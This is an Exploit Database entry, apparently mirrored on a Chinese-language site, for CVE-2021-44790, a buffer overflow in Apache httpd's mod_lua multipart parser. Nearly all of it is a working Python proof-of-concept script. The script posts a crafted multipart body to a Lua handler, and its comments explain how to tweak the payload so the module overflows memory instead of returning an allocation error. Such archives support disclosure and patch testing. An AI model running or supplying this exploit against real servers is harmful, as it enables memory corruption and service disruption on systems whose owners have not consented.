Apache 2.4.x – Buffer Overflow

• Exploit Database
• 15 阅读

• 作者： Sunil Iyengar
  日期： 2023-04-01
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51193/

• # Exploit Title: Apache 2.4.x - Buffer Overflow
  # Date: Jan 2 2023
  # Exploit Author: Sunil Iyengar
  # Vendor Homepage: https://httpd.apache.org/
  # Software Link: https://archive.apache.org/dist/httpd/
  # Version: Any version less than 2.4.51. Tested on 2.4.50 and 2.4.51
  # Tested on: (Server) Kali, (Client) MacOS Monterey
  # CVE : CVE-2021-44790
  
  
  import requests
  
  #Example "http(s)://<hostname>/process.lua"
  url = "http(s)://<hostname>/<luafile>"
  
  payload = "4\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n0\r\n4\r\n"
  headers = {
  'Content-Type': 'multipart/form-data; boundary=4'
  }
  
  #Note1: The value for boundary=4, in the above example, is arbitrary. It can be anything else like 1.
  # But this has to match with the values in Payload.
  
  #Note2: The form data as shown above returns the response as "memory allocation error: block too big".
  # But one can change the payload to name=\"name\"\r\n\r\n\r\n4\r\n" and not get the error but on the lua module overflows
  # 3 more bytes during memset
  
  response = requests.request("POST", url, headers=headers, data=payload)
  
  print(response.text)
  
  #Response returned is
  #<h3>Error!</h3>
  #<pre>memory allocation error: block too big</pre>